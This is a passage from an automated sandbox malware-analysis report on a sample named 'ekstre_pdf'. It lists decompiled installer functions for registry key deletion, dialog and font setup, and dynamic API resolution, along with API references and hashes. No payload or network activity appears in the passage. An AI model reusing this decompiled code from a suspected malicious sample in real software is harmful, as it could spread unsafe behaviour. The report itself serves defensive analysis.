
CharNextW.USER32(?,*?|<>/":,00000000,00000000,759D3420,004E0000,?,00403508,004E0000,004E0000,00403810), ref: 00406827
CharNextW.USER32(?,?,?,00000000,?,00403508,004E0000,004E0000,00403810), ref: 00406836
CharNextW.USER32(?,00000000,759D3420,004E0000,?,00403508,004E0000,004E0000,00403810), ref: 0040683B
CharPrevW.USER32(?,?,759D3420,004E0000,?,00403508,004E0000,004E0000,00403810), ref: 0040684E

Strings

*?|<>/":, xrefs: 00406816

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E0040690A(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402eb4
0x00402ebd
0x00402ec6
0x00402ed2
0x00402edb
0x00402ee5
0x00402f0a
0x00402f10
0x00402f15
0x00402f16
0x00402f46
0x00402f1f
0x00402f21
0x00402f71
0x00402f74
0x00000000
0x00402f7a
0x00402f30
0x00402f35
0x00402f37
0x00000000
0x00000000
0x00402f3f
0x00402f44
0x00402f45
0x00402f45
0x00402f52
0x00402f5a
0x00402f61
0x00000000
0x00402f8a
0x00000000
0x00402f69
0x00402ef5
0x00402f08
0x00000000
0x00000000
0x00000000
0x00402f08
0x00402f90

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
Opcode Fuzzy Hash: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x47af00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E00406484();
				}
				 *0x47af88 =  *0x47af88 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d81
0x00401d85
0x00401d9a
0x00401d87
0x00401d89
0x00401d8f
0x00401d8f
0x00401da0
0x00401da3
0x00401dad
0x00401db0
0x00401db8
0x00401dc9
0x00401dcc
0x00401dd7
0x00401dce
0x00401dd0
0x00401dd0
0x00401ddb
0x00401de5
0x00401e0c
0x00401e1b
0x00401e29
0x00401e31
0x00401e39
0x00401e39
0x00401e42
0x00401e48
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32(?,?), ref: 00401DE5
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: f2a2828f45deb97528aef49d9d509868abc92e2908eefca1aef579a6ca54d241
Instruction ID: f99691c08b1b5953795dc27d4e3756a7d9e603589f2652f99c5ef833ba7a9e16
Opcode Fuzzy Hash: f2a2828f45deb97528aef49d9d509868abc92e2908eefca1aef579a6ca54d241
Instruction Fuzzy Hash: FB21F872904119AFCB05DB94DE45AEEBBB5EF08304F14003AF945F62A0D7389951DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x41e5f0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x41e600 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x41e607 = 1;
				 *0x41e604 = _t15 & 0x00000001;
				 *0x41e605 = _t15 & 0x00000002;
				 *0x41e606 = _t15 & 0x00000004;
				E0040657A(_t9, _t31, _t33, 0x41e60c,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x41e5f0);
				_push(_t18);
				_push(_t31);
				E00406484();
				 *0x47af88 =  *0x47af88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e4e
0x00401e59
0x00401e5b
0x00401e68
0x00401e7f
0x00401e84
0x00401e91
0x00401e96
0x00401e9a
0x00401ea5
0x00401eac
0x00401ebe
0x00401ec4
0x00401ec9
0x00401ed3
0x00402638
0x0040156d
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll,00000000), ref: 00406779

CreateFontIndirectW.GDI32(0041E5F0), ref: 00401ED3

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: 77d04bd14fa1706ff5204d69e199dcc55fdb9ca516316b559510d5c3b28bfa28
Instruction ID: 1ed75c4faf7ddd754be29bd4f751447f67fe1b75e1dd90c1e3733c41a24d19c1
Opcode Fuzzy Hash: 77d04bd14fa1706ff5204d69e199dcc55fdb9ca516316b559510d5c3b28bfa28
Instruction Fuzzy Hash: 7701B575904261AFEB006BB1AD0DBDA3FB0AB25305F44C839F941B61D2C7B904048B2D

Uniqueness

Uniqueness Score: -1.00%

Function 6ED61F7B Relevance: 7.5, APIs: 5, Instructions: 38
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED61F7B(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t11;

				_t11 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t11);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t11, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x6ed61f92
0x6ed61fa0
0x6ed61fab
0x6ed61fb6
0x6ed61fbf
0x6ed61fca

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000808,00000000,6ED62B4C,00000000,00000808), ref: 6ED61F8C
GlobalAlloc.KERNEL32(00000040,00000000), ref: 6ED61F97
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6ED61FAB
GetProcAddress.KERNEL32(?,00000000), ref: 6ED61FB6
GlobalFree.KERNEL32(00000000), ref: 6ED61FBF

Memory Dump Source

Source File: 00000000.00000002.3063969058.000000006ED61000.00000020.00000001.01000000.00000004.sdmp, Offset: 6ED60000, based on PE: true

Associated: 00000000.00000002.3063862656.000000006ED60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3064061225.000000006ED64000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3064139209.000000006ED66000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ed60000_ekstre_pdf.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: b583ecb5019bd1cfa44b18fcc0e726a12659784dab213564038d6aaca4982210
Instruction ID: 40fe6e1fd6d4e55309837fd954972064f633ff2f9bd4990add47da27c07fd594
Opcode Fuzzy Hash: b583ecb5019bd1cfa44b18fcc0e726a12659784dab213564038d6aaca4982210
Instruction Fuzzy Hash: 55F0AC32108539BBDF511AA7DC1CD67BF6CFB8B6FAF160215F619D11A0C562A8028771

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push("true");
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E00406484();
				}
				 *0x47af88 =  *0x47af88 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c43
0x00401c45
0x00401c4c
0x00401c4f
0x00401c52
0x00401c5c
0x00401c60
0x00401c63
0x00401c6c
0x00401c6c
0x00401c6f
0x00401c73
0x00401c7c
0x00401c7c
0x00401c7f
0x00401c83
0x00401c85
0x00401cda
0x00401cdc
0x00401ce7
0x00401cf1
0x00401cf4
0x00401cf4
0x00401cfd
0x00000000
0x00401c87
0x00401c8e
0x00401c90
0x00401c93
0x00401c99
0x00401ca0
0x00401ca3
0x00401ccb
0x00401d03
0x00401d03
0x00401ca5
0x00401cb3
0x00401cbb
0x00401cbe
0x00401cbe
0x00401ca3
0x00401d06
0x00401d09
0x00401d0f
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 1d387913b37d6a1e2d4bd3e6d518871224701df7eae9621831cb2c9b05367e6b
Instruction ID: 2b5787addccd93faf33016a8efc8bfc3ddcd3da41f3334b76af39efb2d3ca388
Opcode Fuzzy Hash: 1d387913b37d6a1e2d4bd3e6d518871224701df7eae9621831cb2c9b05367e6b
Instruction Fuzzy Hash: 55219E7190420AAFEF05AFA4D94AAAE7BB4FF84344F14453EF605B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404D46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E0040657A(_t44, _t50, 0x450268, 0x450268, _a8);
				wsprintfW(_t34 + lstrlenW(0x450268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x472ed8, _a4, 0x450268);
			}

0x00404d4f
0x00404d54
0x00404d5c
0x00404d5d
0x00404d6a
0x00404d72
0x00404d73
0x00404d75
0x00404d77
0x00404d79
0x00404d7c
0x00404d7c
0x00404d83
0x00404d89
0x00404d89
0x00404d90
0x00404d97
0x00404d9a
0x00404d9d
0x00404d9d
0x00404da1
0x00404db1
0x00404db3
0x00404db6
0x00404d5f
0x00404d5f
0x00404d66
0x00404d66
0x00404dbe
0x00404dc9
0x00404ddf
0x00404df0
0x00404e0c

APIs

lstrlenW.KERNEL32(00450268,00450268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
wsprintfW.USER32 ref: 00404DF0
SetDlgItemTextW.USER32(?,00450268), ref: 00404E03

Strings

%u.%u%s%s, xrefs: 00404DD1

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 592e5b96c5d9d4fbad5e00eee13d4890058110fd06e5ba0e1273c5688c603748
Instruction ID: c72c010c5f4cb7d111e2bb5b297625f5a25206b1e28be0412e58ec95d78b2a3d
Opcode Fuzzy Hash: 592e5b96c5d9d4fbad5e00eee13d4890058110fd06e5ba0e1273c5688c603748
Instruction Fuzzy Hash: D511D5739041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78C81282E8

Uniqueness

Uniqueness Score: -1.00%

Function 6ED61F1E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED61F1E(intOrPtr _a4, WCHAR* _a8) {
				intOrPtr _t11;
				intOrPtr _t19;
				WCHAR* _t21;

				_t11 = _a4;
				if( *((intOrPtr*)(_t11 + 4)) != 1) {
					_t21 = _a8;
					_t13 =  ==  ? 0x6ed640d8 : L"error";
					lstrcpyW(_t21,  ==  ? 0x6ed640d8 : L"error");
				} else {
					_t19 =  *((intOrPtr*)(_t11 + 0x1c98));
					if(( *(_t11 + 0x1010) & 0x00000100) != 0) {
						_t19 =  *((intOrPtr*)( *((intOrPtr*)(_t11 + 0x100c)) + 1));
					}
					_t21 = _a8;
					wsprintfW(_t21, L"callback%d", _t19);
				}
				return _t21;
			}

0x6ed61f1e
0x6ed61f29
0x6ed61f5c
0x6ed61f6c
0x6ed61f71
0x6ed61f2b
0x6ed61f35
0x6ed61f3b
0x6ed61f43
0x6ed61f43
0x6ed61f46
0x6ed61f51
0x6ed61f57
0x6ed61f7a

APIs

wsprintfW.USER32 ref: 6ED61F51
lstrcpyW.KERNEL32(?,error), ref: 6ED61F71

Strings

error, xrefs: 6ED61F67, 6ED61F6F
callback%d, xrefs: 6ED61F4B

Memory Dump Source

